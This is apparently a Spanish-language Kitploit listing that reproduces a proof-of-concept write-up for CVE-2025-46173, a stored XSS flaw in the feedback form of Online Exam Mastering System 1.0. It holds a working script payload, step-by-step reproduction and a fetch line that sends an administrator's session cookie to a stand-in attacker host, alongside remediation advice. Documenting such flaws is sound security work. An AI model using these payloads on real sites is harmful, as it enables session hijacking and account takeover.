Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-46173 — prueba de concepto para el CVE-2025-46173 | Kitploit
Herramientas/GitHubGitHub/pruthuraut/cve-2025-46173
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

prueba de concepto para el CVE-2025-46173

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-46173 - Cross-Site Scripting (XSS) Almacenado en Online Exam Mastering System 1.0

📌 Resumen

CVE-2025-46173 es una vulnerabilidad de Cross-Site Scripting (XSS) Almacenado descubierta en Online Exam Mastering System 1.0 de code-projects. La vulnerabilidad existe en el componente feedback.php donde la entrada del usuario en el campo Nombre no está adecuadamente sanitizada, permitiendo a un actor malicioso inyectar JavaScript arbitrario. Cuando un administrador visualiza este feedback en el panel de administración (dash.php), el payload se ejecuta en el navegador del administrador, lo que provoca secuestro de sesión y una potencial escalada de privilegios.


🧠 Detalles de la Vulnerabilidad

  • Tipo de Vulnerabilidad: Cross-Site Scripting Almacenado (XSS)
  • CVE-ID: CVE-2025-46173
  • Proveedor: code-projects
  • Producto: Online Exam Mastering System
  • Versión Afectada: 1.0
  • Componente: feedback.php,
Descargar herramienta
dash.php
  • Vector de Ataque: Remoto
  • Impacto: Escalada de Privilegios, Secuestro de Sesión

  • 📷 Prueba de Concepto

    1. Inyección

    Un usuario envía el siguiente payload en el campo Nombre del formulario de feedback:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    

    Payload en el formulario de feedback

    2. Disparador

    Cuando el administrador posteriormente visualiza el feedback enviado en dash.php, el payload se ejecuta:

    Administrador dispara XSS

    3. Resultado

    La cookie de sesión del administrador queda expuesta a través de document.cookie, la cual puede ser exfiltrada:

    root@kitploit:~
    <script>
      fetch("http://attacker.com/steal?cookie=" + document.cookie);
    </script>
    

    ⚙️ Pasos para Reproducir

    1. Clonar o configurar la versión vulnerable desde code-projects.

    2. Navegar a localhost/exam/feedback.php.

    3. Rellenar el campo "Nombre" con:

      root@kitploit:~
      <script>alert(document.cookie)</script>
      
    4. Enviar el formulario.

    5. Iniciar sesión como administrador y visitar dash.php?q=3 para ver el feedback.

    6. El script se ejecutará en el contexto del administrador.


    🔥 Impacto

    La explotación exitosa permite a un atacante remoto:

    • Robar cookies de sesión del administrador
    • Suplantar al usuario administrador
    • Obtener acceso administrativo completo
    • Modificar o eliminar datos de prueba
    • Escalar privilegios

    🔒 Remediación Recomendada

    • Sanitizar la entrada del usuario escapando los caracteres especiales HTML (por ejemplo, &, <, >, ").
    • Usar una biblioteca de sanitización robusta como htmlspecialchars() de PHP, o una combinación de validación en el frontend y sanitización en el backend.
    • Implementar una Política de Seguridad del Contenido (CSP).
    • Considerar codificar los datos antes de renderizarlos en el DOM.

    🔗 Referencias

    • Blind Cross-Site Scripting (Invicti)
    • Acunetix - Detecting Blind XSS
    • OWASP XSS Prevention Cheat Sheet

    👤 Descubridor

    Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


    Las capturas de pantalla son solo con fines educativos. Todas las pruebas se realizaron en un entorno local.

    🎥 Video PoC

    Haga clic aquí para ver el video de demostración


    ⚠️ Aviso de Exención de Responsabilidad

    Esta información se proporciona únicamente con fines educativos y de investigación. No la utilice en sistemas que no posea o para los cuales no tenga permiso explícito para realizar pruebas.